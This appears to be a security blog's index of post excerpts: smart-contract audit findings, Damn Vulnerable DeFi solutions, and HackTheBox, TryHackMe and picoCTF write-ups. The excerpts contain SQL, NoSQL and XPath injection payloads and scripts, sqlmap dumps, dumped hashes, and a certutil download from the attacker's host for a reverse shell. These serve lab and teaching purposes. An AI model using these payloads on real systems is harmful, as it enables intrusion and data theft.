Access control who?
The short version I took part in the OneShot audit contest on Codehawks and reported a High-rated vulnerability. The issue lies in the lack of access control on the NFTs used to battle: it is possible for any user to send someone else's NFT to battle. This can represent an unfair advantage, if an attacker decides to use an NFT stronger than the one they own to have better chances of winning the battle. Here is the full report I submitted to the judges of this contest, along with a PoC to exploi...
Agree to disagree
The short version I took part in the OneShot audit contest on Codehawks and reported two High-severity vulnerabilities regarding a game-theory flaw in their matchmaking process. However, the judge did not agree, calling the protocol implementation a "design decision" instead of a vulnerability. In the litigation period, I submitted my thoughts concerning how this design decision would actually cause the protocol to come to a full halt, given enough time, but my concerns were disregarded saying ...
All known and no random makes users dull
The contest I took part in the OneShot audit contest on Codehawks and obtained a High-severity vulnerability regarding the use of randomness on-chain, a typical, difficult-to-solve issue that affects many protocols. Using randomness in an environment where everything is deterministic and publicly known is not that easy, unfortunately. When implemented poorly, the use of weak randomness can completely compromise the purpose of a protocol, as was the case here. The short version The protocol f...
My $0.01
I participated in the "The Standard" audit contest on Codehawks, and identified a High-severity vulnerability. The issue is related to the usage of a loop over an unbounded data structure, which can cause different users to incur very different gas costs: so much so, that a late user might have to face gas costs so high to effectively discourage him to take part in the protocol AT ALL. Of course, no protocol wants to draw users away simply through poor coding practices, so the vulnerability was...
The gas war
Introduction I thought I had a high. I participated in the Voting Booth bug bounty and reported a high-rated vulnerability. But it was rejected. Because I did not read a key piece of information that rendered all my thought process completely useless. Let's see what it was. Let us reopen the imaginary wound. The source code You can find the source code on my other blog post, the triumphant one about the bug that was, indeed, approved and validated. It is here, if you are interested. What fol...
The Bug of Confusion
The Contest Just before Christmas, the team at Codehawks created a bug bounty challenge to mimic one bug they encountered during one of their assessments. The challenge was to identify the same bug they reported during a real audit and report it as in a bug bounty program. The code base, shown right here, was simplified for the sake of clarity: // SPDX-License-Identifier: MIT pragma solidity ^0.8.23; import {Math} from "@openzeppelin/contracts/utils/math/Math.sol"; // @title VotingBooth // @a...
N out of M
The Audit In one of our most recent security reviews at Inference, we run into an interesting situation, which is discussed in this blog post. The premise is that of a smart contract with a simple access control mechanism: In order to change a storage variable, you have to be in possession of at least N out of M passwords This is a gigantic simplification of the original situation, however, it will help to discuss the interesting bug without getting lost in unnecessary details. The Smart C...
Tincho fuzz test
The Tincho Exercise While taking a look at Cyfrin Updraft, more on that in a later post, potentially, instructor Patrick Collins highly suggests to take onto a small challenge: a fuzz test exercise proposed by Tincho. You can find the repo of the challenge here. While Tincho already suggests his own solution right underneath the exercise, I thought to write this to go through my thought process developing the test, as it turned out to be structurally different, and equally effective, as Tincho...
Damn Vulnerable DeFi - Puppet v2
The contract The developers of the previous pool seem to have learned the lesson. And released a new version! Now they’re using a Uniswap v2 exchange as a price oracle, along with the recommended utility libraries. That should be enough. You start with 20 ETH and 10000 DVT tokens in balance. The pool has a million DVT tokens in balance. You know what to do. The only contract associated with the challenge is the following one: contract PuppetV2Pool { using SafeMath for uint256; addre...
Damn Vulnerable DeFi - Puppet
The contract There’s a lending pool where users can borrow Damn Valuable Tokens (DVTs). To do so, they first need to deposit twice the borrow amount in ETH as collateral. The pool currently has 100000 DVTs in liquidity. There’s a DVT market opened in an old Uniswap v1 exchange, currently with 10 ETH and 10 DVT in liquidity. Pass the challenge by taking all tokens from the lending pool. You start with 25 ETH and 1000 DVTs in balance. contract PuppetPool is ReentrancyGuard { using Address f...
Damn Vulnerable DeFi - Compromised
The contract Starting with just 0.1 ETH in balance, pass the challenge by obtaining all ETH available in the exchange. We also receive two very long strings as part of the challenge: 4d 48 68 6a 4e 6a 63 34 5a 57 59 78 59 57 45 30 4e 54 5a 6b 59 54 59 31 59 7a 5a 6d 59 7a 55 34 4e 6a 46 6b 4e 44 51 34 4f 54 4a 6a 5a 47 5a 68 59 7a 42 6a 4e 6d 4d 34 59 7a 49 31 4e 6a 42 69 5a 6a 42 6a 4f 57 5a 69 59 32 52 68 5a 54 4a 6d 4e 44 63 7a 4e 57 45 35 4d 48 67 79 4d 44 67 79 4e 44 4a 6a 4e 44 42 68...
Damn Vulnerable DeFi - Selfie
The contract A new cool lending pool has launched! It’s now offering flash loans of DVT tokens. It even includes a fancy governance mechanism to control it. What could go wrong, right ? You start with no DVT tokens in balance, and the pool has 1.5 million. Your goal is to take them all. The challenge has an interface which you shouldn't care too much about. The other contracts are more interesting, here are the key points about each of them. First, the contract offering the flash loan funct...
Damn Vulnerable DeFi - The Rewarder
The contract There’s a pool offering rewards in tokens every 5 days for those who deposit their DVT tokens into it. Alice, Bob, Charlie and David have already deposited some DVT tokens, and have won their rewards! You don’t have any DVT tokens. But in the upcoming round, you must claim most rewards for yourself. By the way, rumours say a new pool has just launched. Isn’t it offering flash loans of DVT tokens? This time there are multiple contracts. Two of them are just the contracts that rep...
Damn Vulnerable DeFi - Side Entrance
The contract The goal is to drain a pool that offers flash loans. The issue lies in the usage of an interface without any restriction on the msg.sender, that can implement that interface and perform any action. The solution The interesting part of the challenge contract is this function: function flashLoan(uint256 amount) external { uint256 balanceBefore = address(this).balance; IFlashLoanEtherReceiver(msg.sender).execute{value: amount}(); if (address(this).balance &...
Damn Vulnerable DeFi - Truster
The contract There is a pool containing 1 million DVT. The task is to drain it starting from nothing. The solution The contract is extremely short, here it is: // SPDX-License-Identifier: MIT pragma solidity ^0.8.0; import "@openzeppelin/contracts/utils/Address.sol"; import "@openzeppelin/contracts/security/ReentrancyGuard.sol"; import "../DamnValuableToken.sol"; /** * @title TrusterLenderPool * @author Damn Vulnerable DeFi (https://damnvulnerabledefi.xyz) */ contract TrusterLenderPool ...
Damn Vulnerable DeFi - Naive Receiver
The contract The contract emulates a flash loan functionality. The challenge is to steal 10 ETH from the "receiver" user, while using the address whose alias is "player". The solution Each time a user requests a flash loan, they have to pay 1 ETH as a fee. In order to steal 10 ETH from a user, we can request 10 flash loans from their account. This is possible because the "flashLoan" functionality has no access control, so anyone can request flash loans for any other user by specifying their a...
Damn Vulnerable DeFi - Unstoppable
The contract The goal is to stop the flash loan functionality. The vault has a function called "flashLoan" that will revert in four different scenarios. Among these, the one that we can control that will make the function fail for all users is the third one, that checks whether "totalSupply" is different than "balanceBefore". if (convertToShares(totalSupply) != balanceBefore) revert InvalidBalance(); "totalSupply" represents the number of existing tokens: if we analyze ERC20.sol, we can see i...
Carpediem - HTB - Key Points
Target's IP: 10.10.11.167
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
Hostname revealed: carpediem.htb
Through subdomain enumeration, we can find a new domain name as well: portal.carpediem.htb
There is a request subject to SQL injection:
GET /?p=bikes&c=c4ca4238a0b923820dcc509a6f75849b'%2b(select*from(select(sleep(20)))a)%2b'
Automating with SQLmap, we can dump the entire database, including the admin's hash:
1,uploads/1635793020HONDAXADV.png,Male,<blank>,jhammond@carpediem.htb,Hamm...
Health - HTB - Key Points
Target's IP: 10.10.11.176
Hostname: health.htb
The functionality of the website calls for SSRF, and it is, indeed, the case. We can bypass the filter on the website using an open redirect, as shown on Hacktricks.
Redirecting to the filtered port on 3000, we get the source code of a Gogs page. Checking for Gogs on the internet, there is a known SQL injection vulnerability we can exploit:
python2 redirect.py --port 80 --ip 10.10.14.40 "http://10.10.11.176:3000/api/v1/users/search?q=e')/**/union/**/all/...
MetaTwo - HTB - Key Points
Target's IP: 10.10.11.186
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
Unknown host: metapress.htb
Proudly powered by WordPress. Let's enumerate using wpscan.
[i] Plugin(s) Identified:
[+] bo...
BabyEncryption - HTB - Challenges
import string
#from secret import MSG
#ct = encryption(MSG)
f = open('./msg.enc','r')
text = bytes.fromhex(f.readline())
result = ""
alphabet = string.printable
for char in text:
    for letter in alphabet:
        if((123 * ord(letter) + 18 ) % 256 == char):
            result += letter
print(result)
Toxic - HTB - Challenges
Challenge's address: 139.59.189.189:32670
Checking out the source code attached to the challenge, it's easy to spot the call to unserialize. Following this blog post, https://snoopysecurity.github.io/web-application-security/2021/01/08/02_php_object_injection_exploitation-notes.html, we note that the only model defined in the challenge also implements the __destruct magic method, which will help us in our exploitation.
The method includes files, so it will allow us to read them: we have an LFI on our hands. Fi...
Ambassador - HTB - Key Points
Target's IP: 10.10.11.183
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3000/tcp open  ppp
3306/tcp open  mysql
Grafana on 3000 subject to unauthorized arbitrary file read, as per https://www.exploit-db.com/exploits/50581
Reading passwd, consul and grafana and developer are users on the box
Googling for common configuration files, we can read /etc/grafana/grafana.ini
# Either "mysql", "postgres" or "sqlite3", it's your choice
;type = sqlite3
;host = 127.0.0.1:3306
;name = grafana
;user = roo...
Phonebook - HTB - Challenges
To exploit the wildcard SQL injection, this script helps us to identify the username:
import requests
import string
alphabet = string.digits + string.ascii_lowercase + string.ascii_uppercase + string.punctuation
word = ''
while(True):
    for letter in alphabet:
        # the trailing '*' is the wildcard: the login succeeds as long as the prefix is right
        x = requests.post('http://165.22.122.58:31348/login', data = {'username': word + letter + '*', 'password': '*'})
        if x.url == 'http://165.22.122.58:31348/':
            word = word + letter
            print(word)
With a slight modificat...
Shared - HTB - Key Points
Target's IP: 10.10.11.172
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https
Root page / redirects to: http://shared.htb
Subdomain enumeration returns checkout as a valid subdomain, so we also add checkout.shared.htb to the hosts file.
Ecommerce software by Prestashop seems subject to an exploit, more specifically https://www.exploit-db.com/exploits/45964, but I was not able to make it work.
The custom_cart cookie is injectable, the answer when requesting the page on the checkout ...
UpDown - HTB - Key Points
Target's IP: 10.10.11.177
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
Connecting to the website leaks a domain name, siteisup.htb
Recursive brute forcing of directories reveals the following two ones:
/dev
/dev/.git
Downloading the .git is easy thanks to directory indexing, just run wget -r http://siteisup.htb/dev/.git
Analyzing the git repo, there is an interesting commit we must checkout:
commit 8812785e31c879261050e72e20f298ae8c43b565
Author: Abdou.Y <84577967+ab2pentest@users.noreply.gith...
Faculty - HTB - Key Points
Target's IP: 10.10.11.169
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
http-title: Did not follow redirect to http://faculty.htb
JavaScript on the login page suggests that if you intercept the response and change 3 to 1 you can bypass the login
cblake@faculty.htb
ejames@faculty.htb
jsmith@faculty.htb
sqlmap -u 'http://faculty.htb/view_schedule.php?id=1' -T users --dump
Administrator | 1    | 1fecbe762af147c1176a0fc2c722a345 | admin
Generating PDFs as an authenticated user, you can see that the tool used to ...
Shoppy - HTB - Key Points
Target's IP: 10.10.11.180
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
9093/tcp open  copycat
The login suffers from NoSQL injection, we can bypass the login stage with
username=admin'||'1==1//&password=aaasa
Again, injecting the user search and downloading the export:
username "admin"
password "23c6877d9e2b564ef8b32c3a23de27b2"
username "josh"
password "6ebcea65320589ca4f2f1ce039975995"
These look like md5 hashes, trying hashcat to crack them:
6ebcea65320589ca4f2f1ce039...
Photobomb - HTB - Key Points
Target's IP: 10.10.11.182
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
Trying to connect to the web server reveals an important piece of information:
Unknown host: photobomb.htb
Connecting to the web server returns 401 - Unauthorized to all requests, but from the developer tools we see that the page includes a JavaScript file that contains sensitive information:
function init() {
  // Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me
  if (document.cookie.match(/...
Support - HTB - Key Points
Target IP: 10.10.11.174
nmap -sS -p- -T4 --min-rate=10000 10.10.11.174
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-12 09:18 CEST
Nmap scan report for 10.10.11.174
Host is up (0.11s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldap...
Trick - HTB - Key Points
Target's IP: 10.10.11.166
nmap -sS -p- -T4 --min-rate=10000 10.10.11.166
PORT   STATE SERVICE
22/tcp open  ssh
25/tcp open  smtp
53/tcp open  domain
80/tcp open  http
└─# nslookup
> server 10.10.11.166
Default server: 10.10.11.166
Address: 10.10.11.166#53
> 10.10.11.166
166.11.10.10.in-addr.arpa       name = trick.htb.
We add this domain name to our /etc/hosts file. Now we can enumerate further for subdomains.
Asking for a zone transfer with
dig axfr trick.htb @trick.htb
reveals a new subdomain, preprod-...
Vulnnet Endgame - THM - Key Points
Initial scan reveals 22 and 80. We also have a domain name from the introduction of the box, so we can enumerate for subdomains.
Run gobuster vhost -u http://vulnnet.thm -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
I found 4 more valid domains: blog, api, shop and admin1.
Brute forcing for directories in the admin1 domain reveals some interesting ones, like vendor, fileadmin, typo3temp, typo3.
Typo3 seems to be an open source CMS, we lack credentials to login though.
Analyzing th...
RingZer0CTF - Hash me if you can
We need to create a small script in order to be quick enough to solve this challenge, as we cannot possibly copy the message, hash it and send the correct request in under two seconds.
The script to solve this challenge is fairly straightforward, here it is:
import requests
import hashlib
x = requests.get('http://challenges.ringzer0team.com:10013/')
if '----- BEGIN MESSAGE -----' in x.text:
    start = x.text.index('----- BEGIN MESSAGE -----') + len('----- BEGIN MESSAGE -----') + 15 #15 is required to...
Nunchuks - HTB - Key Points
Open ports: 22, 80 and 443 after a super quick scan.
Certificate from 443 reveals a domain, nunchucks.htb
Subdomain enumeration reveals another possible target, store.nunchucks.htb
The store has a newsletter subscription function that reflects the email address provided. Using Wappalyzer, we can see the website is running on NodeJS, so let's look for SSTI on NodeJS.
Hacktricks suggests the following payload to try out: {{7*7}}. This should return 49. It is the payload listed under the template engine ...
Shocker - HTB - Key Points
Open port on 80 and a 2222 which is actually SSH on deeper inspection (detect the specific service using -sV in nmap).
Enumeration of the web server won't reveal much besides a cgi-bin directory; fuzzing for scripts returns a user.sh script.
We can try and exploit this with Shellshock, using the metasploit module exploit/multi/http/apache_mod_cgi_bash_env_exec. This gives us low privileged access on the box.
Running "id" we see our user is part of the lxd group, meaning we can immediately escalate to...
basic-mod-2 - picoCTF 2022
import string
# 26 letters + 10 digits + "_" = 37 symbols, indexed by the modular inverse minus one
alphabet = string.ascii_uppercase + string.digits + "_"
code = "104 85 69 354 344 50 149 65 187 420 77 127 385 318 133 72 206 236 206 83 342 206 370"
words = code.split(" ")
result = ""
for word in words:
    module = int(word) % 41
    # brute-force the inverse of the residue modulo 41
    for i in range (41):
        if((module * i ) % 41 == 1 ):
            result += alphabet[i-1]
            break
print(result)
basic-mod-1 - picoCTF 2022
import string
alphabet = string.ascii_uppercase + string.digits + "_"
code = "202 137 390 235 114 369 198 110 350 396 390 383 225 258 38 291 75 324 401 142 288 397"
words = code.split(" ")
result = ""
for word in words:
    result += alphabet[int(word) % 37]
print(result)
substitution0, 1 and 2 - picoCTF 2022
Uncomment cipher, plain and crypt to solve either the first, second or third substitution challenge.
Always start with the assumption that the last few words are "the flag is picoCTF{<something>}" and you already have the substitution for some of the letters. With these, you can try to understand what is missing looking at the English text and add letters to the substitution until you get a fully formed text (and the flag).
#cipher = '''QWITJSYHXCNDFERMUKGOPVALBZ
#Hjkjpmre Djykqet qkrgj, axo...
transposition-trial - PicoCTF 2022
cipher = "heTfl g as iicpCTo{7F4NRP051N51635P3X51N3_V091B0AE}2"
result = ""
# every group of three characters is rotated: the third one goes first
for i in range(2, len(cipher), 3):
    result += cipher[i] + cipher[i-2] + cipher [i-1]
    print(result)
Most Cookies - PicoCTF
Followed explanation at this link.
Just remember to put your cookie inside the cookie variable and update the wordlist with the possible secrets used to sign the cookie.
import flask
import hashlib
from sys import argv
from flask.json.tag import TaggedJSONSerializer
from itsdangerous import URLSafeTimedSerializer, TimestampSigner, BadSignature
cookie = 'eyJ2ZXJ5X2F1dGgiOiJibGFuayJ9.Yh4n3A.tAnfOTWKodF6TbdczS-Pt-JPzdM'
wordlist = ["snickerdoodle", "chocolate chip", "oatmeal raisin", "gingersnap", "shortbre...
caas - PicoCTF
Look at the JS provided, while at a first look you might think there might be some SSTI involved, once you look at the code it's clear: Node runs a system command inserting user input. We only need to stop the current program's execution and start something more useful. A combination of a semicolon and anything else you might want to use is fine. For example, I used ls to see file names in the current directory and then printed the one that interested me, like this:https://caas.mars.picoctf.net/...
X marks the spot - pico
import requests
import string
chars = string.ascii_lowercase + string.ascii_uppercase + string.digits + "}_"
flag = "picoCTF{"
while True:
    for char in chars:
        # XPath injection: the query only matches when the guessed prefix is right
        result = requests.post("http://mercury.picoctf.net:20297/", data = {"name": "' or //*[starts-with(text(), '"+flag+char+"')] or 'a'='b", "pass":"pass"})
        if "right path" in result.text:
            flag += char
            print("Added char: " + flag)
            break
Zeno - THM
At first, after a basic scan, there is only a 12340 TCP port open and SSH on 22. Connecting to it using netcat reveals this is an Apache 2.4.6 webserver, running on PHP 5.4.16.
Using a directory scanner, we find out there is RMS installed on the webserver.
In our manual scraping of the website, we can notice that, once we create an account, we get a sample message from an account called "administrator", and in the Contact Us section there is an email address that is registered to the domain pathfi...
Skynet - THM - Braindump
There is a web server and samba running, automatically scan both using dirb and enum4linux.
The web page served is a useless search, nothing in the source code either.
There is anonymous listing enabled on the samba server, there are some directories to examine.
Dirb returned a login form exposed on a /squirrelmail directory, there is also a version number: 1.4.23
There is a known RCE for this version, but it requires login credentials. Maybe we have a username (milesdyson) but password?
In the meanwhil...
Alfred - THM - Braindump
There are two web servers, one on 80 revealing an email address, and one on 8080 that is a Jenkins login page. Jenkins has, notoriously, a poor password policy.
Searching on Google, default is admin. Tried simple combinations, admin:admin worked.
We can modify the configuration for the existing project and insert a build command to run when building it, we can try to launch a reverse shell from it.
We can use this command in the build:
certutil.exe -urlcache -split -f http://10.9.4.63:8000/Advanced....
Steel Mountain - THM - Braindump
After an initial scan, there are ports that suggest this is a Windows box. There is also a web server on 80, which shows an image and nothing more. Nothing found using dirbuster.
There is also another web server, on 8080. Reading the source of the page, this shows a name and a version, Rejetto HFS 2.3. There are some known RCE exploits for this specific version, one in metasploit called exploit/windows/http/rejetto_hfs_exec, let's try this one. Seems to work, meterpreter shell opened. We are user bill in...
Road - THM
There is an SSH port open and a web server. With no credentials, the web server is a better option right now.
I started by looking around the website: there is the information about who created the platform right in front of you, but I could not turn that into valuable info with a basic search. I registered an account and logged in. Snoop around the authenticated pages, and you see there is a functionality to upload a profile picture, but it is admin-only. However, this tells us the ema...
speeds and feeds - PicoCTF
Once you connect to the given address, you get a very long list of strings that make no sense. I tried to look at them to find some sort of pattern, but nothing caught the eye, so I copied one of the lines and pasted it into the search bar. Google suggests this might be something called G-code. Turns out, it is a programming language for machines and you can find online interpreters to plot the code you have been given, which will show you the flag. The interpreter I used is at https://ncviewer....
The numbers - PicoCTF
Open the file, it contains a long list of numbers. These are very low in value, so it is clearly not ASCII. Actually, these are so low that they might just be references to the letters' positions in the alphabet. Turns out, this is all there is to this challenge. Easy peasy ;) ...
Glory of the garden - PicoCTF
The file you download contains a string that gives you the flag. It should have been my first attempt, but it was actually my fourth:
- opened the picture with eog to look at it, pointless;
- used exiftool to inspect metadata, pointless;
- used steghide to extract hidden data using a blank password and the passwords "garden" and "glorious", still pointless;
- ran strings on the file, success!
Transformation - PicoCTF
Translate the string into unicode and insert it into a variable, then treat the encryption as a mathematical function and try to obtain a reverse formula. Imagine that A and B are the characters that, when mixed as described in the challenge description, generate the first character of the encoded text. To retrieve A, just push the encoded character 8 places to the right, so to clean all values that were influenced by the value of B.To retrieve B, you now have the encoded value and A itself: wha...
Petshop Pro
HackerOne CTF - Petshop Pro
Flag 1
When you go to checkout, you submit a URL-encoded body with the post. Insert a new object in there or modify an existing one and insert a negative price to gain a flag.
Flag 2
There is a login form (found through a directory bust). There is a logic error that helps you enumerate users, as a correct username will give you a different error message. Using hydra with rockyou for usernames turns up a valid username fairly quickly. Then you can just use this username a...
OWASP Juice Shop
This is how I solved some of the challenges listed in the OWASP Juice Shop scoreboard, you can find the one that interests you by searching its name in the table.
Error Handling (Provoke an error that is neither very gracefully nor consistently handled.)
Try a URL of your choice to see if anything funny happens, some error handling practices could give you great results in terms of finding vulnerabilities. In this case, it reveals the framework AND it solves the challenge.
Score Boa...
Empline - THM
After the initial scan there are three open ports. Two are clearly no-goes unless you feel like bruteforcing (which I would not suggest, unwise at least). Look up the web page, most links seem pointless but one gives away both a domain and, more importantly, a subdomain. Save both of them in your /etc/hosts and go take a look. The initial front page could not give you clearer instructions on what to do next. There is a software name and a version: Google this combination of informat...
Superspam - THM
Super-Spam - THM
The ports after the initial scan, apart from the usual service on port 80, are fairly uncommon, like FTP on 4019 and SSH on 4012. The first I tried (more because this is a CTF than anything else) is to anonymously login to FTP, which gave us access to quite a few files. From the note, we could assume adam and super-spam are usernames. We also learn that the capture file is a reminder of how the alien got in, so we download that for further analysis and give it to Wireshark. While...
Year of the Fox - THM
There are three open ports, including samba and a web server. Access to the server is limited by HTTP Basic Authentication, and brute forcing it right now is not a viable option. We first try to enumerate domains, shares and users through enum4linux. Fortunately enough, the box allows to log in using null sessions, so enum4linux is capable of giving us some juicy info, including two usernames.
We can try to brute force our access using these usernames either into samba or pas...
Year of the dog - THM
The scan doesn't give you much to choose from, two open ports and no reasonable way of interacting with SSH, so let's start from HTTP.
The web server seems to be a waiting queue, what for is unknown. How does the page determine your position in queue every time you reload the page? Cookies, indeed. The cookie is not immediately clear to decode, but you can easily spot some SQL injection possibility by adding a single quote at the end of it. Besides enumerating the DB, there i...
CMSpit
CMSpit - THM
After the initial scan, there are two open ports. Brute forcing the first would be unreasonable without having even tried looking at the other one, so let's start from the web server. On the login page, right up front, notice the shiny name of this CMS. With the power of this knowledge, start asking Google and sooner rather than later you should encounter this. Follow what it says like you never followed any other instruction and in no time you should be able to change the admin's pa...
Sweettooth Inc
Sweettooth Inc. - THM
There are four open ports. Following the indications of the room, we further analyze the port running the DB. There is a metasploit module that can give you the version running, but it is not able to go past authentication. In order to find a database user, you can check if there are available endpoints under /debug... Mostly two, one gives you a username, the other one a whole lot of information you will need to carefully look at.
You need the username to answer one of the ...
Couch
Couch - THM
Scan the machine with a basic nmap scan (nothing too fancy needed) in order to answer the first question. If you ran a -A scan or just a -sV, you also have the answers to question two, three and four.
Now, onto the researching side of the challenge. Honestly, with no prior experience with CouchDB, I basically ran into Google's arms and kindly encountered the awesome documentation where you can find everything you need. Take a couple of minutes, read it and you should have no issue find...
harder
harder - THM
After an initial scan, three ports seem open. As we have nothing to try on these SSH ports, let's look at the web server. Every request seems to be a 404, but look at the request: it issues a cookie for a specific domain. This probably means virtual hosting is in place, so add the domain to your /etc/hosts list and browse to the page. Both a directory scan and the hint hidden behind the login form (super default credentials, you can do it without brute forcing it) suggest the pres...
BlobBlog
BlobBlog - THM
After the initial scan there are two open ports. With nothing to try on SSH, let's start with the web browser. Launch a directory bust and start looking around while it runs. There are a couple of comments on the front page, the default Apache initial page. The first one is base64+brainfuck and tells something about knocking on ports, suggesting to try ports 1, 3 and 5. The second one tells us a password, which is base58 encoded. Following the first hint, connect simultaneously ...
Lunizz CTF
Lunizz CTF - THM
Run a scan to see what services are running. Once it's done, look at it: an exposed DB surely looks interesting. Default credentials don't seem to work, and we have no known exploit to run against the SSH server, so let's just focus on the HTTP server for now. Running a directory buster reveals some interesting files and directories, mainly:
- interesting.txt, where we can find credentials for the DB;
- whatever, which doesn't seem to be accessible for some DB error right now.
Let's ...
VulnNet: Node
VulnNet: Node - THM There is a single open port, so you should probably start there. Watch closely, there is something odd with the requests. Why does the app use a cookie for a session that doesn't require any authorization whatsoever? Is it easy to guess the encoding and what the cookie is holding? Turns out, the cookie is base64 encoded and contains some JSON data. First attempt, I tried to turn from guest to admin, which is absolutely pointless. So I turned to Google, and asked him what ...
Smag Grotto
Smag Grotto - THM After a basic scan (nothing too fancy needed here) you should see two open ports. Let's set aside SSH for now and check out the website. There seems to be very little, but a quick directory bust reveals a useful file you can download and analyze. This file gives you three powerful pieces of information: credentials; a subdomain where to use said credentials; the path where to log in with those. Modify your /etc/hosts in order to reach the subdomain and log in to the platform. This...
magician
magician - THM After the initial scan, there appear to be two open ports on the target. One of them should suggest trying the oldie-but-goodie anonymous session, which can give you a pretty powerful hint. Follow it and then watch what you have to face on the other port. This service suffers from the ImageMagick vulnerability known as ImageTragick, which leads to RCE. In order to exploit it you can: create your own payload (but why reinvent the wheel, right?); PayloadsAllTheThings has an entire ...
Library
Library - THM Two ports open, and one is clearly the better choice to start snooping around. Not too much to look at, but you can probably detect there is some useful information displayed on the page (if we consider Lorem Ipsum useless, what is the only customized content on the page?). Use this information and the generous hint in robots.txt to start the most boring attack there is (sit and wait, go grab something to eat or drink or whatever suits you). Once you are in, the flag is there. And ...
Dav
DAV - THM Only one port open, so we had better scan it thoroughly. A simple directory bust will reveal a directory that requires HTTP basic authentication, besides revealing the obvious service running on it. Default credentials are in place, so gaining access isn't all that difficult. In the file system shown there is a username and its hash, which are just the credentials you used to log in (not sure, didn't crack the hash). With credentials for a WebDAV service, turn to the cadaver client. Search o...
Thompson
Thompson - THM This is an easy machine, fairly straightforward. Scan thoroughly as usual. Navigating to the port running an HTTP web server reveals an Apache version. Look for default credentials and try the first couple of them; it should not be too hard. Once you have access to the manager application, there is both a manual way to exploit it (you can upload WAR files, search on Google for a step by step procedure to exploit this) and a Metasploit module ready for you to use. This gives you shell...
Joker
HA Joker CTF - THM Run your favourite scan, there should be three ports open on this machine. At first, port 80 is the only viable option (the others are SSH and a web server on 8080 that requires a password). If you are a Batman fan, take the time to check out all the quotes, including the ones in the source code. They are pointless CTF-wise, but they are awesome. Find the secret directory using a buster (add common extensions so you are sure not to miss it, as I did). That file gives you a us...
Jack
Jack - THM It's a WordPress blog, so the usual user enumeration vulnerability due to the error message applies. WPScan identifies three users (jack, danny & wendy). Look around a while, but it seems clear very quickly that you should try your hand at brute forcing (not a fan, don't like this in challenges). I don't know if there is a different intended way to gain access, but this worked (although it took some time). I would suggest a brute force against xmlrpc, and don't use a huge wordlist (rockyo...
Tokyo Ghoul
Tokyo Ghoul - THM As always, start with scanning and looking at what is up against you. A mindful nmap scan should tell you that FTP allows for anonymous login (if you like to run different scans, remember to always check for this manually, you never know). Inside the directories there is a whole bunch of files to grab, be sure to catch them all (wink). The binary can be analyzed with radare2. Analyze the check password function. Before calling strcmp it loads the parameters in rdi and rsi. ...
HaskHell
HaskHell - THM This room nudges you fairly clearly in the right directions, hence the short writeup, straight to the point as always. When you start off, you have two open ports, SSH and HTTP (although on an uncommon port). The professor's website clearly states you have the opportunity to upload some Haskell. Find the directory where you can upload with some busting. If you, like me at the time of this writing, are no Haskell programmer, Google is your friend. Here I paste the code I used as up...
Reverse Engineering
Reverse Engineering - THM For this room I used radare2. I know people are very opinionated about their debuggers and language, feel free to complain. Seems I have been unable to post pictures, so just know that while you read you should be looking at your terminal after you issued the command pdf @ main in the radare console. Task 1 The main function, after symbols and entry points analysis, is more than you need to solve this task. I won't tell you where the password is, you should simpl...
Tony the tiger
Tony the Tiger - THM
nmap -sT 10.10.242.59 -p-
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
The first flag, Tony's. The blog on port 80 holds the first flag. Take a look at the different posts there. If you find yourself poking around too much, stop looking at what meets the eye and go for stego. In the first post, you sh...
Ninja Skills
Ninja Skills - THM The room asks you to write some basic scripts to find the solutions to its answers. The scripts shown here won't be the most visually beautiful ones, but they will get the job done. All the scripts require a file with the file names provided in the room, one per line. We'll refer to this file as "filelist". Let's move on to question one: Which file is owned by the "best-group" group?
while read line
do
  echo $line;
  VAR1=$(find / -name "$line" -group "best-gro...